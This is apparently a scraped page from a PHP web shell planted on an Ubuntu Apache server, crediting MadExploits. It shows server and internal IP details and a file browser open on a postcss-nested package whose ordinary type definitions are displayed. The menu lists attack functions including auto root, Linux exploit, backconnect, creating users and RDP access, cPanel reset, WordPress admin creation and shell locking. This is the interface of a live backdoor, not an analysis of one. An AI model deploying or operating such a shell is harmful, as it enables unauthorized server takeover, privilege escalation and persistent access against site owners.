Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
postcss-nested /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.07
KB
-rw-rw-r--
README.md
2.01
KB
-rw-rw-r--
index.d.ts
1.13
KB
-rw-rw-r--
index.js
8.83
KB
-rw-rw-r--
package.json
597
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Original definitions (@types/postcss-nested) // by Maxim Vorontsov <https://github.com/VorontsovMaxim> import { PluginCreator } from 'postcss' declare namespace nested { interface Options { /** * By default, plugin will bubble only `@media`, `@supports` and `@layer` * at-rules. Use this option to add your custom at-rules to this list. */ bubble?: string[] /** * By default, plugin will unwrap only `@font-face`, `@keyframes`, * and `@document` at-rules. You can add your custom at-rules * to this list by this option. */ unwrap?: string[] /** * By default, plugin will strip out any empty selector generated * by intermediate nesting levels. You can set this option to `true` * to preserve them. */ preserveEmpty?: boolean /** * The plugin supports the SCSS custom at-rule `@at-root` which breaks * rule blocks out of their nested position. If you want, you can choose * a new custom name for this rule in your code. */ rootRuleName?: string } type Nested = PluginCreator<Options> } declare const nested: nested.Nested export = nested
Close